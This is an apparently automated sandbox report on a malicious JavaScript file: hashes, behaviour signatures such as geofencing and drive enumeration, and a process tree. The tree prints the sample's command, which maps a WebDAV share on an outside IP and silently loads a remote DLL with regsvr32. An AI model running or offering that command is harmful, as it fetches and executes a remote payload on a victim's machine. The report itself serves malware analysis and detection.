Analysis
max time kernel: 133s
max time network: 145s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
submitted: 24-07-2024 02:21
Static task: static1
Behavioral task: behavioral1
  Sample: 19028118422498350.js
  Resource: win7-20240705-en (windows7-x64)
  4 signatures, 150 seconds
Behavioral task: behavioral2
  Sample: 19028118422498350.js
  Resource: win10v2004-20240709-en (windows10-2004-x64)
  5 signatures, 150 seconds
General
Target: 19028118422498350.js
Size: 5KB
MD5: 790010d2de10be9efabde1b4f87cc2f4
SHA1: df5ff0c42bd4f6441f5265d1d64e5ad6aa59c143
SHA256: 9eeef8fa997320dd8cdbe847e1bef8ae2a10709cc7ccb5585b7f429f83a1c28c
SHA512: c99912c06b5e24344d65a5b05f0a22a918a48e9bc74f4545d971e2fd6426f53dd98f647e89277af79e6ea89cd5f01b840ebb10cdadc62b3bb6dc82682226fe2d
SSDEEP: 96:qrsxfjaTaYhdIKMW8wnuKG5zONAkbybONa:KsxfOeYhdIKMDwtG5zsAkbybsa
Score: 7/10
Malware Config
Signatures
Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                               Process
  Key value queried  \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation  wscript.exe
Command and Scripting Interpreter: JavaScript (1 TTP)
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
Runs net.exe
Suspicious use of WriteProcessMemory (4 IoCs)
  description                         pid   Process      procid_target
  PID 3876 wrote to memory of 336     3876  wscript.exe  84
  PID 3876 wrote to memory of 336     3876  wscript.exe  84
  PID 336 wrote to memory of 4352     336   cmd.exe      86
  PID 336 wrote to memory of 4352     336   cmd.exe      86
Processes
1. C:\Windows\system32\wscript.exe
   Command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\19028118422498350.js
   PID: 3876
   Signatures: Checks computer location settings; Suspicious use of WriteProcessMemory
   2. C:\Windows\System32\cmd.exe (child of 1)
      Command line: "C:\Windows\System32\cmd.exe" /k net use \\45.9.74.36@8888\davwwwroot\ && regsvr32 /s \\45.9.74.36@8888\davwwwroot\114661144227600.dll
      PID: 336
      Signatures: Suspicious use of WriteProcessMemory
      3. C:\Windows\system32\net.exe (child of 2)
         Command line: net use \\45.9.74.36@8888\davwwwroot\
         PID: 4352